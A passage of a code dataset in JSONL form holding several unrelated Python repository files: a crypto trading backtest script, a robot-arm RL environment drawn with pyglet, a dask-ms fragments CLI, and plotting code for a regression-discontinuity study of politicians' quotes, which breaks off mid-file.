collections.deque(word1)\n w2 = collections.deque(word2)\n res = []\n while len(w1) > 0 and len(w2) > 0:\n res.append (w1.popleft())\n res.append (w2.popleft())\n\n while len(w1) > 0:\n res.append (w1.popleft())\n while len(w2) > 0:\n res.append (w2.popleft())\n\n return ''.join(res)","repo_name":"Mehariwamlake/competitive-Programming","sub_path":"merge_sring.py","file_name":"merge_sring.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"41045563182","text":"import argparse\nimport logging\nimport pandas as pd\nimport sys\nimport os\n\nfrom strategies import Breakout\nfrom strategies import MeanReversion\nfrom strategies import TrendFollowing\nfrom strategies import SMACrossover\nfrom strategies import OrderFlow\nfrom strategies import FiveMinuteScalper\nfrom pyalgotrade import plotter\n\n# Set up the logging level and format\nlogging.basicConfig(level=logging.INFO, format=\"%(asctime)s %(levelname)s %(message)s\")\n \nclass Backtest:\n def __init__(self, symbol, level2_Data, features, model, csv_data_path):\n self.symbol = symbol\n self.level2Data = level2_Data\n self.features = features\n self.model = model\n self.csv_data_path = csv_data_path\n self.data = pd.read_csv(csv_data_path)\n\ndef backtest_strategies(self):\n \"\"\"\n Runs a series of backtests on different trading strategies.\n \"\"\"\n try:\n strategies = [Breakout(), MeanReversion(), TrendFollowing(), SMACrossover(), OrderFlow()]\n for strategy in strategies:\n strategy.run(self.symbol, self.level2Data, self.features, self.model)\n except ImportError:\n logging.error(\"Strategy module not found.\")\n sys.exit(1)\n except Exception as e:\n logging.error(\"Error occurred during backtest: %s\", str(e))\n\n# backtest_breakout_strategy\ndef backtest_breakout(self, symbol, level2Data, features, model):\n try:\n # Create the strategy\n strategy = Breakout()\n\n # Run the strategy\n strategy.run(symbol, level2Data, features, model)\n\n # Plot the results\n plt = plotter.StrategyPlotter(strategy)\n plt.plot()\n\n except Exception as e:\n logging.error(\"An error occurred: %s\", str(e))\n sys.exit(1)\n\n# backtest_fiveminutescalper\ndef backtest_fiveminutescalper(symbol, level2Data, features, model):\n try:\n # Create the strategy\n strategy = FiveMinuteScalper(symbol, level2Data, features, model)\n\n # Run the strategy\n strategy.run()\n\n # Plot the results\n plt = plotter.StrategyPlotter(strategy)\n plt.plot()\n\n except Exception as e:\n logging.error(\"An error occurred: %s\", str(e))\n sys.exit(1)\n\n# backtest_mean_reversion\ndef backtest_mean_reversion(symbol, level2Data, features):\n try:\n # Create the strategy\n strategy = MeanReversion(symbol, level2Data, features)\n\n # Run the strategy\n strategy.run()\n\n # Plot the results\n plt = plotter.StrategyPlotter(strategy)\n plt.plot()\n\n except Exception as e:\n logging.error(\"An error occurred: %s\", str(e))\n sys.exit(1)\n\n# backtest_sma_crossover\ndef backtest_sma_crossover(symbol, level2Data, features):\n try:\n # Create the strategy\n strategy = SMACrossover(symbol, level2Data, features)\n\n # Run the strategy\n strategy.run()\n\n # Plot the results\n plt = plotter.StrategyPlotter(strategy)\n plt.plot()\n\n except Exception as e:\n logging.error(\"An error occurred: %s\", str(e))\n sys.exit(1)\n \n# backtest_order_flow\ndef backtest_order_flow(symbol, level2Data, features):\n try:\n # Create the strategy\n strat = OrderFlow(symbol, level2Data, features)\n\n # Run the strategy\n strat.run()\n\n # Plot the results\n plt = plotter.StrategyPlotter(strat)\n plt.plot()\n\n except Exception as e:\n logging.error(\"An error occurred: %s\", str(e))\n sys.exit(1)\n\ndef main():\n # Define the command-line arguments\n parser = argparse.ArgumentParser(description=\"Backtest different trading strategies on KuCoin\")\n\n parser.add_argument(\"-s\", \"--symbol\", type=str, required=True, help=\"The trading symbol to backtest on\")\n\n parser.add_argument(\"-sd\", \"--start_date\", type=str, required=True, help=\"The start date of the backtesting period in YYYY-MM-DD format\")\n\n parser.add_argument(\"-ed\", \"--end_date\", type=str, required=True, help=\"The end date of the backtesting period in YYYY-MM-DD format\")\n\n parser.add_argument(\"-q\", \"--quantity\", type=float, required=True, help=\"The quantity of the asset to trade in each transaction\")\n\n parser.add_argument(\"-st\", \"--strategy\", type=str, required=True, choices=[\"fiveminutescalper\", \"trend_following\", \"mean_reversion\"], help=\"The strategy to backtest\")\n\n parser.add_argument(\"-fp\", \"--file_path\", type=str, default=None, help=\"The file path of the CSV data for fiveminutescalper strategy\")\n\n parser.add_argument(\"-mp\", \"--model_path\", type=str, default=None, help=\"The file path of the ANN model for fiveminutescalper strategy\")\n \n # Parse the command-line arguments\n args = parser.parse_args()\n \n if args.file_path is None or args.model_path is None:\n raise ValueError(\"You need to provide both file_path and model_path\")\n else: \n \n # Trading configuration\n window_size=100\n trading_fee=0.008\n slippage=0.001\n \n df = pd.read_csv ('file_name.csv')\n \n KucoinTradingBot = KucoinTradingBot()\n features = KucoinTradingBot.get_features(df)\n \n # Call the corresponding backtesting function based on the strategy argument\n if args.strategy == \"fiveminutescalper\":\n backtest_fiveminutescalper(args.file_path, args.model_path)\n \n elif args.strategy == \"mean_reversion\":\n backtest_mean_reversion(args.symbol, args.start_date, args.end_date, args.quantity)\n \n elif args.strategy == \"breakout\":\n backtest_breakout(args.symbol, args.start_date, args.end_date, args.quantity)\n \n elif args.strategy == \"smacrossover\":\n backtest_sma_crossover(args.symbol, args.start_date, args.end_date, args.quantity)\n \n elif args.strategy == \"orderflow\":\n backtest_order_flow(args.symbol, args.start_date, args.end_date, args.quantity)\n \n def preprocess_data(self):\n self.data['datetime'] = pd.to_datetime(self.data['openTime'])\n self.data.set_index('datetime', inplace=True)\n self.data['target'] = self.data['closePrice'].shift(-1)\n self.data.dropna(inplace=True)\n\n # Sort the DataFrame by the index (datetime)\n self.data = self.data.sort_index()\n\n # Now drop the unnecessary columns\n self.X = self.data.drop(columns=['symbol', 'openTime', 'target'])\n\n # Convert y to a 1D array\n self.y = np.array(self.data['target']).ravel()\n \nif __name__ == \"__main__\":\n # Run the main function\n main()","repo_name":"mOrGaNCrYpTo/omega_bot","sub_path":"src/strategies/backtest.py","file_name":"backtest.py","file_ext":"py","file_size_in_byte":6612,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"39568000165","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 7 14:14:42 2019\n\n@author: yangna\n\n@e-mail: ityangna0402@163.com\n\"\"\"\n\nimport numpy as np\n\nclass ArmEnv(object):#手臂的逻辑运动和动作等\n state_shape = 2#2个观测值\n action_shape = 2#2个动作\n #转动角度范围\n action_threshold = [-1, 1]\n dis = None\n #目标点\n goal = {'x_val': 100., 'y_val': 100., 'l_val': 40}\n dt = 0.1\n \n def __init__(self):\n #[(100., 0.5235988), (100., 0.5235988)]\n self.arm_info = np.zeros(2, dtype=[('len', np.float32), ('ran', np.float32)])\n self.arm_info['len'] = 100#两段手臂的长度\n self.arm_info['ran'] = np.pi/6#两段手臂的旋转角度\n \n def reset(self):\n self.arm_info['ran'] = 2*np.pi*np.random.rand(2)\n return self.arm_info['ran']\n \n def sample_action(self):\n return np.random.rand(2)-0.5\n \n def render(self):\n if self.dis is None:\n self.dis = display(self.arm_info, self.goal)\n self.dis.render()\n \n def step(self, action):\n done = False\n reward = 0.\n #计算单位时间dt内旋转的角度,将角度限制在360度以内\n action = np.clip(action, *self.action_threshold)\n self.arm_info['ran'] += action * self.dt\n self.arm_info['ran'] %= np.pi * 2\n #将两截手臂的角度信息当做一个state\n state = self.arm_info['ran']\n #计算finger的坐标如果接触到goal,回合结束\n (a1l, a2l) = self.arm_info['len']\n (a1r, a2r) = self.arm_info['ran']\n a1xy = np.array([200., 200.])\n a1xy_ = np.array([np.cos(a1r), np.sin(a1r)]) * a1l + a1xy\n finger = np.array([np.cos(a1r + a2r), np.sin(a1r + a2r)]) * a2l + a1xy_\n\n #根据finger和goal的坐标得出done和reward\n if (self.goal['x_val'] - self.goal['l_val']/2 < finger[0] < self.goal['x_val'] + self.goal['l_val']/2) and (self.goal['y_val'] - self.goal['l_val']/2 < finger[1] < self.goal['y_val'] + self.goal['l_val']/2):\n done = True\n reward = 1.\n return state, reward, done\n \n def close(self):\n self.dis.stopandclose()\n\n#API的路径https://pythonhosted.org/pyglet/\nimport pyglet#https://pyglet.readthedocs.io/en/pyglet-1.3-maintenance/#\nclass display(pyglet.window.Window):#手臂的可视化\n bar_thc = 5\n def __init__(self, arm_info, goal):#画机械手臂\n # vsync是True,按屏幕频率刷新,False就不按照那个频率\n super(display, self).__init__(width=400, height=400, resizable=False, caption='Arm', vsync=False)\n \n self.arm_info = arm_info\n self.center_coord = np.array([200, 200])#添加窗口中心点,手臂的起始点\n \n pyglet.gl.glClearColor(1, 1, 1, 1)#窗口背景的颜色\n self.batch = pyglet.graphics.Batch()#刷子\n #添加蓝点\n self.goal = self.batch.add(\n #pyglet.gl.GL_QUADS的说明https://pyglet.readthedocs.io/en/pyglet-1.3-maintenance/programming_guide/graphics.html\n 4, pyglet.gl.GL_QUADS, None,#4个点\n #'v2f'和'c3B'的说明\n #https://pyglet.readthedocs.io/en/pyglet-1.3-maintenance/programming_guide/graphics.html#vertex-attributes\n ('v2f', [goal['x_val'] - goal['l_val'] / 2, goal['y_val'] - goal['l_val'] / 2,#x1,y1\n goal['x_val'] - goal['l_val'] / 2, goal['y_val'] + goal['l_val'] / 2,#x2,y2\n goal['x_val'] + goal['l_val'] / 2, goal['y_val'] + goal['l_val'] / 2,#x3,y3\n goal['x_val'] + goal['l_val'] / 2, goal['y_val'] - goal['l_val'] / 2]),#x4,y4\n ('c3B', (86, 109, 249) * 4))#c3B表示的是这个物体的颜色,4个顶点都是(86, 109, 249)\n #添加一条手臂\n self.arm1 = self.batch.add(\n 4, pyglet.gl.GL_QUADS, None,\n ('v2f', [250, 250,\n 250, 300,\n 260, 300,\n 260, 250]),\n ('c3B', (249, 86, 86) * 4,))\n #添加第二条手臂\n self.arm2 = self.batch.add(\n 4, pyglet.gl.GL_QUADS, None,\n ('v2f', [100, 150,\n 100, 160,\n 200, 160,\n 200, 150]), \n ('c3B', (249, 86, 86) * 4,))\n \n def render(self):#刷新并显示\n self._update_arm()#更新手臂信息\n self.switch_to()\n self.dispatch_events()\n self.dispatch_event('on_draw')\n self.flip()\n \n def on_draw(self):#刷新手臂\n self.clear()#清屏\n self.batch.draw()#画上batch里面的内容\n \n def _update_arm(self):#更新手臂信息\n (a1l, a2l) = self.arm_info['len']\n (a1r, a2r) = self.arm_info['ran']\n a1xy = self.center_coord\n a1xy_ = np.array([np.cos(a1r), np.sin(a1r)]) * a1l + a1xy\n a2xy_ = np.array([np.cos(a1r+a2r), np.sin(a1r+a2r)]) * a2l + a1xy_\n \n a1tr, a2tr = np.pi / 2 - self.arm_info['ran'][0], np.pi / 2 - self.arm_info['ran'].sum()\n xy000 = a1xy + np.array([-np.cos(a1tr), np.sin(a1tr)]) * self.bar_thc\n xy001 = a1xy + np.array([np.cos(a1tr), -np.sin(a1tr)]) * self.bar_thc\n xy011 = a1xy_ + np.array([np.cos(a1tr), -np.sin(a1tr)]) * self.bar_thc\n xy012 = a1xy_ + np.array([-np.cos(a1tr), np.sin(a1tr)]) * self.bar_thc\n \n xy100 = a1xy_ + np.array([np.cos(a2tr), -np.sin(a2tr)]) * self.bar_thc\n xy101 = a1xy_ + np.array([-np.cos(a2tr), np.sin(a2tr)]) * self.bar_thc\n xy111 = a2xy_ + np.array([-np.cos(a2tr), np.sin(a2tr)]) * self.bar_thc\n xy112 = a2xy_ + np.array([np.cos(a2tr), -np.sin(a2tr)]) * self.bar_thc\n \n self.arm1.vertices = np.concatenate((xy000, xy001, xy011, xy012))\n self.arm2.vertices = np.concatenate((xy100, xy101, xy111, xy112))\n \n def stopandclose(self):\n self.close()\n \n \n#if __name__ == '__main__':\n# env = ArmEnv()\n# count = 10000\n# while 0 < count:\n# count -= 1\n# env.render()\n# env.step(env.sample_action())\n# env.close()","repo_name":"yangnaGitHub/LearningProcess","sub_path":"module/dqn/机器手臂/armenv.py","file_name":"armenv.py","file_ext":"py","file_size_in_byte":6195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74482291751","text":"import click\nimport dask\nfrom daskms.fsspec_store import DaskMSStore\nfrom daskms.experimental.fragments import get_ancestry\nfrom daskms.experimental.zarr import xds_to_zarr, xds_from_zarr\n\n\n@click.group(help=\"Base command for interacting with fragments.\")\ndef fragments():\n pass\n\n\n@click.command(help=\"List fragment and parents.\")\n@click.argument(\n \"fragment_path\",\n type=DaskMSStore,\n)\n@click.option(\n \"-p/-np\",\n \"--prune/--no-prune\",\n default=False,\n)\ndef stat(fragment_path, prune):\n\n ancestors = get_ancestry(fragment_path, only_required=prune)\n\n click.echo(\"Ancestry:\")\n\n for i, fg in enumerate(ancestors):\n if i == 0:\n click.echo(f\" {fg.full_path} ---> root\")\n elif i == len(ancestors) - 1:\n click.echo(f\" {fg.full_path} ---> target\")\n else:\n click.echo(f\" {fg.full_path}\")\n\n\n@click.command(help=\"Change fragment parent.\")\n@click.argument(\n \"fragment_path\",\n type=DaskMSStore,\n)\n@click.argument(\n \"parent_path\",\n type=DaskMSStore,\n)\ndef rebase(fragment_path, parent_path):\n xdsl = xds_from_zarr(fragment_path, columns=[])\n\n xdsl = [\n xds.assign_attrs({\"__dask_ms_parent_url__\": parent_path.url}) for xds in xdsl\n ]\n\n writes = xds_to_zarr(xdsl, fragment_path)\n\n dask.compute(writes)\n\n\nfragments.add_command(stat)\nfragments.add_command(rebase)\n\n\ndef main():\n fragments()\n","repo_name":"ratt-ru/dask-ms","sub_path":"daskms/apps/fragments.py","file_name":"fragments.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"28268786979","text":"import argparse\nfrom copy import deepcopy\nimport collections\nfrom datetime import datetime\nimport numpy as np\nfrom matplotlib.collections import PatchCollection\nimport matplotlib.dates as mdates\nfrom matplotlib.legend import Legend\nfrom matplotlib.legend_handler import HandlerBase\nfrom matplotlib.lines import Line2D\nfrom matplotlib.patches import Polygon\nimport matplotlib.pyplot as plt\nfrom matplotlib.text import Text as mText\nimport pandas as pd\nimport pickle\nfrom pathlib import Path\nimport re\nimport string\nimport sys\nfrom typing import Dict, List, Tuple\n\nsys.path.append(str(Path(__file__).parent.parent)) # Only works when keeping the original repo structure\nfrom utils.plots import saveFigure, timeLinePlot, ONE_COL_FIGSIZE, TWO_COL_FIGSIZE, NARROW_TWO_COL_FIGSIZE, \\\n NARROW_NARROW_TWO_COL_FIGSIZE, PRESIDENTIAL_ELECTIONS, LANDSCAPE_NARROW_FIGSIZE, LANDSCAPE_FIGSIZE\nfrom analysis.RDD import RDD, KINK, TITLES, NAMES\nfrom analysis.aggregate import MISSING_MONTHS\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--rdd', help='Folder containing fitted RDDs', required=True)\nparser.add_argument('--img', help='Folder to write images to.', required=True)\nparser.add_argument('--SI', help='SI material', required=False, type=str)\n\nFONTSIZE = 14\nCORE_FEATURES = ['liwc_Negemo', 'liwc_Anger', 'liwc_Anx', 'liwc_Sad', 'liwc_Swear']\nSI_FEATURES = ['liwc_Negemo', 'empath_negative_emotion', 'liwc_Anger', 'liwc_Anx', 'liwc_Sad', 'liwc_Swear', 'empath_swearing_terms']\nLIWC_FEATURES = CORE_FEATURES + ['liwc_Posemo']\nDROPPED_DATA = [datetime(int(m.split('-')[0]), int(m.split('-')[1]), 15) for m in MISSING_MONTHS]\n\n# Colors, after https://mikemol.github.io/technique/colorblind/2018/02/11/color-safe-palette.html\nVERMILLION = '#D55E00'\nORANGE = '#E69F00'\nSKYBLUE = '#56B4E9'\nREDDISH = '#CC79A7'\nBLUE = '#0072B2'\nBLUEGREEN = '#009E73'\n\n\ndef _default_style(): return {'color': 'tab:grey', 'linewidth': 2.5, 'scatter_color': 'tab:grey'}\n\n\nSTYLES = {\n 'liwc_Negemo': {'color': VERMILLION, 'linewidth': 2.5, 'scatter_color': VERMILLION},\n 'empath_negative_emotion': {'color': VERMILLION, 'linewidth': 2.5, 'scatter_color': VERMILLION},\n 'liwc_Anger': {'color': ORANGE, 'linewidth': 2.5, 'scatter_color': ORANGE},\n 'liwc_Anx': {'color': SKYBLUE, 'linewidth': 2.5, 'scatter_color': SKYBLUE},\n 'liwc_Sad': {'color': REDDISH, 'linewidth': 2.5, 'scatter_color': REDDISH},\n 'liwc_Swear': {'color': BLUE, 'linewidth': 2.5, 'scatter_color': BLUE},\n 'empath_swearing_terms': {'color': BLUE, 'linewidth': 2.5, 'scatter_color': BLUE},\n 'liwc_Posemo': {'color': BLUEGREEN, 'linewidth': 2.5, 'scatter_color': BLUEGREEN},\n 'linreg': {'color': 'black', 'linewidth': 2.5, 'linestyle': '-.'}\n}\n\nPARTY_STYLES = {\n 'democrats': {'color': 'tab:blue', 'linewidth': 2.5, 'scatter_color': 'tab:blue', 'label': 'Democrats'},\n 'republicans': {'color': 'tab:red', 'linewidth': 2.5, 'scatter_color': 'tab:red', 'label': 'Republicans'}\n}\n\nPOLITICIAN_IDS = { # Make Individual Plots for these\n 'Q76': 'Barack Obama',\n 'Q6294': 'Hillary Clinton',\n 'Q22686': 'Donald Trump',\n 'Q6279': 'Joe Biden',\n 'Q24313': 'Mike Pence',\n 'Q4496': 'Mitt Romney',\n}\n# 'Q10390': 'John McCain'\n\nPROMINENCE_IDS = { # Annotate them in score-vs-verbosity plots\n 'Q76': 'Barack Obama',\n 'Q22686': 'Donald Trump',\n 'Q4496': 'Mitt Romney',\n 'Q6294': 'Hillary Clinton',\n 'Q207': 'George W. Bush',\n 'Q10390': 'John McCain',\n 'Q6279': 'Joe Biden',\n}\n# 'Q170581': 'Nancy Pelosi',\n\nPROMINENCE_SHORT = {\n 'Barack Obama': 'O',\n 'Donald Trump': 'T',\n 'Mitt Romney': 'R',\n 'Hillary Clinton': 'C',\n 'George W. Bush': 'Bu',\n 'John McCain': 'M',\n 'Joe Biden': 'Bi',\n}\n# 'Nancy Pelosi': 'P',\n# 'Bernie Sanders': 'S'\n\nV_label = {\n 0: 'Most prominent speaker quartile',\n 1: '2nd most prominent speaker quartile',\n 2: '3rd most prominent speaker quartile',\n 3: 'Least prominent speaker quartile'\n}\n\n\ndef _conf_only(ax: plt.axis, feature: str, model: RDD, color: str):\n lower, upper = model._rdd_confidence(feature)\n from_date = 0\n for low, up in zip(lower, upper):\n to_date = from_date + len(low)\n ax.fill_between(model.data.date[from_date:to_date], low, up, alpha=.2, color=color)\n from_date = to_date\n\n\ndef _rdd_only(ax: plt.axis, feature: str, model: RDD, kwargs: Dict):\n kwargs = deepcopy(kwargs)\n del kwargs['scatter_color']\n X_rdd, Y_rdd = model._get_rdd_plot_data(feature)\n dates_rdd = [model._get_approx_date(x) for x in X_rdd]\n for i in range(len(dates_rdd) // 2):\n if i > 0:\n kwargs['label'] = ''\n timeLinePlot([dates_rdd[2 * i], dates_rdd[2 * i + 1]], [Y_rdd[2 * i], Y_rdd[2 * i + 1]], ax=ax, snsargs=kwargs)\n\n\ndef _scatter_only(ax: plt.axis, feature: str, model: RDD, color: str, s: int = 25):\n timeLinePlot(model.data.date, model.data[feature], ax=ax, snsargs={'s': s, 'color': color}, kind='scatter')\n\n\ndef _grid_annotate(ax: plt.axis, model: RDD, feature: str, **kwargs):\n txt = r\"{\\mathrm{adj}}\"\n r2 = f'$R^2_{txt}$={model.rdd[feature].loc[\"r2_adj\"]:.2f}'\n params = '\\n'.join([\n ', '.join([\n r'$\\alpha_0$=' +\n model.get_table(asPandas=True)[r'$\\alpha_0$'].loc[feature].split('(')[0],\n r'$\\beta_0$=' +\n model.get_table(asPandas=True)[r'$\\beta_0$'].loc[feature].split('(')[0]\n ]),\n ', '.join([\n r'$\\alpha$=' + model.get_table(asPandas=True)[r'$\\alpha$'].loc[feature].split('(')[\n 0],\n r'$\\beta$=' + model.get_table(asPandas=True)[r'$\\beta$'].loc[feature].split('(')[0]\n ])\n ])\n # Aligned version in comments:\n # params = '\\\\\\\\'.join([\n # ', '.join([\n # r'\\alpha_0=' +\n # model.get_table(asPandas=True)[r'$\\alpha_0$'].loc[feature].split('(')[0],\n # r'&\\beta_0=' +\n # model.get_table(asPandas=True)[r'$\\beta_0$'].loc[feature].split('(')[0]\n # ]),\n # ', '.join([\n # r'\\alpha=' + model.get_table(asPandas=True)[r'$\\alpha$'].loc[feature].split('(')[\n # 0],\n # r'&\\beta=' + model.get_table(asPandas=True)[r'$\\beta$'].loc[feature].split('(')[0]\n # ])\n # ])\n # params = r'\\begin{align*}' + re.sub(r'(\\*+)', r'\\\\text{\\1}', params) + r'\\end{align*}'\n # rc('text', usetex=True)\n # rc('text.latex', preamble=r'\\usepackage{amsmath}')\n default_box_props = dict(boxstyle='round', facecolor='white', alpha=.75, ec='none')\n box_props = kwargs.get('box_props', default_box_props)\n ax.text(0.03, 0.05, r2, transform=ax.transAxes, fontsize=FONTSIZE-2, verticalalignment='bottom',\n horizontalalignment='left', bbox=box_props)\n ax.text(0.5, kwargs.get('param_y', .97), params, transform=ax.transAxes, fontsize=FONTSIZE-2, verticalalignment='top',\n horizontalalignment='center', bbox=box_props)\n # rc('text', usetex=False)\n\n\ndef grid(models: Dict[str, RDD], ncols: int, nrows: int, features: List[str], style: Dict, gridspec: bool = False,\n **kwargs):\n fontsize = kwargs.get('fontsize', FONTSIZE)\n fontweight = kwargs.get('fontweight', 'bold')\n names = kwargs.get('names', NAMES)\n\n if gridspec:\n assert len(features) == 5, \"Other gridspecs not supported.\"\n fig = plt.figure(figsize=TWO_COL_FIGSIZE)\n gs = fig.add_gridspec(2, 6)\n axs = [\n fig.add_subplot(gs[0, :3]),\n fig.add_subplot(gs[0, 3:6]),\n fig.add_subplot(gs[1, :2]),\n fig.add_subplot(gs[1, 2:4]),\n fig.add_subplot(gs[1, 4:6]),\n ]\n elif kwargs.get('axs', None) is not None:\n fig = plt.gcf()\n axs = kwargs.get('axs')\n else:\n fig, axs = plt.subplots(figsize=NARROW_TWO_COL_FIGSIZE, ncols=ncols, nrows=nrows, sharex='all', sharey='all')\n\n ymin = np.inf\n ymax = - np.inf\n for name, model in models.items():\n for i, feature in enumerate(features):\n ROW = i % nrows\n COL = i // nrows\n if isinstance(axs[0], np.ndarray):\n ax = axs[ROW][COL]\n else:\n ax = axs[i]\n ax.set_title(names[feature], fontsize=fontsize, fontweight=fontweight)\n ax.set_title('(' + kwargs.get('prefix', string.ascii_lowercase)[i] + ')', fontfamily='serif', loc='left',\n fontsize=FONTSIZE+2, fontweight='bold') # Subplot naming\n try:\n selectedStyle = style[feature]\n except KeyError:\n try:\n selectedStyle = style[name][feature]\n except KeyError:\n selectedStyle = style[name]\n\n model.plot(feature,\n ax=ax,\n annotate=kwargs.get('annotate', False),\n lin_reg=kwargs.get('lin_reg', False),\n visuals=kwargs.get('visuals', False),\n **selectedStyle)\n\n if COL > 0:\n ax.tick_params(axis='y', which='both', left=False, right=False)\n if kwargs.get('grid_annotate', False):\n if kwargs.get('y_param'): # plug any number of other features in here if necessary\n _grid_annotate(ax, model, feature, y_param=kwargs.get('y_param'))\n else:\n _grid_annotate(ax, model, feature)\n if kwargs.get('mean_adapt', False):\n _, Y = model._get_rdd_plot_data(feature)\n ymin = min(ymin, min(Y))\n ymax = max(ymax, max(Y))\n else:\n ymin = min(ymin, min(model.data[feature]))\n ymax = max(ymax, max(model.data[feature]))\n if kwargs.get('ylabel', False) and (COL == 0):\n ax.set_ylabel(kwargs.get('ylabel'), fontsize=FONTSIZE)\n if kwargs.get('right_ylabel', False) and (COL == ncols - 1):\n ax.set_ylabel(kwargs.get('right_ylabel'), fontsize=FONTSIZE)\n ax.yaxis.set_label_position(\"right\")\n\n ydiff = ymax - ymin\n if gridspec:\n axs = [axs] # Quick hack to allow the following iteration\n for row in axs:\n if not isinstance(row, np.ndarray):\n row = [row]\n for ax in row:\n if kwargs.get('legend', False):\n ax.legend(fontsize=fontsize, loc='lower left', framealpha=1, fancybox=False,\n ncol=kwargs.get('legendCols', 1))\n else:\n try:\n ax.get_legend().remove()\n except AttributeError:\n pass # There was no legend to begin with\n ax.tick_params(axis='both', which='major', labelsize=fontsize)\n if kwargs.get('mean_adapt', False):\n ax.set_ylim(ymin - ydiff, ymax + ydiff)\n else:\n ax.set_ylim(ymin - 0.25 * ydiff, ymax + 0.25 * ydiff)\n ax.set_xlim(13926.0, 18578.0)\n\n plt.minorticks_off()\n return fig, axs\n\n\ndef scatter_grid(nrows, ncols, model, features, ylims=None, figsize=TWO_COL_FIGSIZE, axs=None, **kwargs):\n if axs is None:\n fig, axs = plt.subplots(figsize=figsize, ncols=ncols, nrows=nrows, sharex='all', sharey='all', squeeze=False)\n else:\n fig = plt.gcf()\n if nrows == 1: # Repack\n axs = [axs]\n if ncols == 1:\n axs = [axs]\n fontsize = kwargs.get('fontsize', FONTSIZE)\n\n ymin, ymax = np.inf, -np.inf\n for i, feature in enumerate(features):\n ROW = i // ncols\n COL = i % ncols\n ax = axs[ROW][COL]\n _scatter_only(ax, feature, model, STYLES[feature]['color'])\n ax.set_title(NAMES[feature], fontweight='bold', fontsize=fontsize)\n ymin = min(ymin, min(model.data[feature]))\n ymax = max(ymax, max(model.data[feature]))\n if COL == 0:\n ax.set_ylabel('Pre-campaign z-scores', fontsize=fontsize)\n if ncols * nrows != 1:\n ax.set_title('(' + kwargs.get('prefix', string.ascii_lowercase)[i]+ ')', fontfamily='serif', loc='left', fontsize=fontsize + 2, fontweight='bold')\n\n ydiff = ymax - ymin\n for row in axs:\n for ax in row:\n ax.tick_params(axis='both', which='major', labelsize=fontsize)\n ax.set_ylim(ymin - 0.25 * ydiff, ymax + 0.25 * ydiff)\n if ylims is not None:\n ax.set_ylim(ylims[0], ylims[1])\n\n fig.autofmt_xdate(rotation=90, ha='left')\n plt.minorticks_off()\n return fig, axs\n\n\ndef basic_model_plots(model_file: Path, base: Path, ylims: Tuple[float, float] = None):\n \"\"\"\n Creates a single plot for every feature the RDD was fitted on.\n Parameters\n ----------\n model_file: Path to an RDD Model\n base: Base folder to store results in\n ylims: Another way to control the y axis limits: They can be directly provided here.\n -------\n \"\"\"\n model = pickle.load(model_file.open('rb'))\n\n # 5x grid\n fig, axs = grid({'agg': model}, 5, 1, CORE_FEATURES, STYLES, grid_annotate=True,\n ylabel='Pre-campaign z-scores')\n saveFigure(fig, base.joinpath('negative_and_swear_grid'))\n\n # 2 x 3 Grid only scatter\n fig, axs = scatter_grid(2, 3, model, LIWC_FEATURES, ylims)\n saveFigure(fig, base.joinpath('2x3_scatter_grid'))\n plt.close()\n\n # Negative Grid only scatter\n fig, axs = scatter_grid(1, 5, model, CORE_FEATURES, ylims, figsize=NARROW_NARROW_TWO_COL_FIGSIZE)\n saveFigure(fig, base.joinpath('negative_scatter_grid'))\n plt.close()\n\n # Negative Grid only posemo\n fig, axs = scatter_grid(1, 1, model, ['liwc_Posemo'], ylims)\n saveFigure(fig, base.joinpath('posemo_scatter'))\n plt.close()\n\n\ndef outlier_plots(model_file: Path, store: Path):\n \"\"\"\n Creates a comparison between \"basic\" and \"outliers removed\" for every feature the RDD was fitted on.\n Parameters\n ----------\n model_file: Path to an RDD Model, including outliers. Naming of the non-outlier model must follow project structure.\n store: Base folder to store results in\n -------\n\n \"\"\"\n outliers = pickle.load(model_file.open('rb'))\n base_model = pickle.load(model_file.parent.joinpath(re.sub('_outliers', '', model_file.name)).open('rb'))\n\n models = collections.OrderedDict()\n models['With Outliers'] = base_model\n models['Without Outliers'] = outliers\n\n outlierStyle = {k: STYLES[k] for k in STYLES}\n baseStyle = {k: _default_style() for k in STYLES}\n for k in baseStyle:\n outlierStyle[k]['label'] = 'With Outliers'\n outlierStyle[k]['scatter_color'] = STYLES[k]['color']\n baseStyle[k]['label'] = 'Without Outliers'\n baseStyle[k]['scatter_color'] = 'tab:grey'\n\n fig, axs = grid(models, 5, 1, CORE_FEATURES,\n {'With Outliers': outlierStyle, 'Without Outliers': baseStyle}, mean_adapt=True, legend=True,\n ylabel='Pre-campaign z-scores')\n\n saveFigure(fig, store.joinpath('negative_and_swear_grid'))\n\n\ndef individual_plots(folder: Path, base: Path):\n \"\"\"\n Creates all feature plots for every feature for every individual RDD in the given folder.\n Parameters\n ----------\n folder: Parent folder, containing RDDs fitted on individual aggregates\n base: Base folder to store figures in\n \"\"\"\n for file in folder.iterdir():\n if not file.name.endswith('pickle'):\n continue\n qid = file.name.split('_')[0]\n if qid not in POLITICIAN_IDS:\n continue\n clearname = POLITICIAN_IDS[qid]\n if 'outlier' in file.name:\n # outlier_plots(file, save_in.joinpath(clearname + '_outlier'))\n pass # We don't really need that\n else:\n basic_model_plots(file, base.joinpath(clearname), ylims=(-10, 20))\n\n\ndef verbosity_vs_parameter(folder: Path, base: Path, kind: str, alpha_CI: float = 0.05, **kwargs):\n \"\"\"\n Plots RDD parameters (y-Axis) vs speaker verbosity (x-axis)\n Parameters\n ----------\n folder: RDD models folder\n base: Img storage folder\n kind: Either \"individual\" or \"ablation\" - changes style adjustments\n alpha_CI: Confidence Interval parameter\n \"\"\"\n verbosity = folder.parent.parent.joinpath('speaker_counts.csv')\n assert verbosity.exists(), \"To create the scatter plot influence / verbosity, there needs to be a speaker count file.\"\n base_model_path = folder.parent.joinpath('QuotationAggregation_RDD.pickle')\n assert base_model_path.exists(), \"To create the scatter plot influence / verbosity, there needs to be a Quotation Aggregation file.\"\n base_model = pickle.load(base_model_path.open('rb'))\n\n def _get_qid(s: str) -> str:\n if 'outlier' in s:\n print('WARNING: Are outlier data supposed to be analysed for individuals?')\n return re.search('Q[0-9]+', s)[0]\n\n class TextHandlerB(HandlerBase):\n \"\"\"\n Allows adding 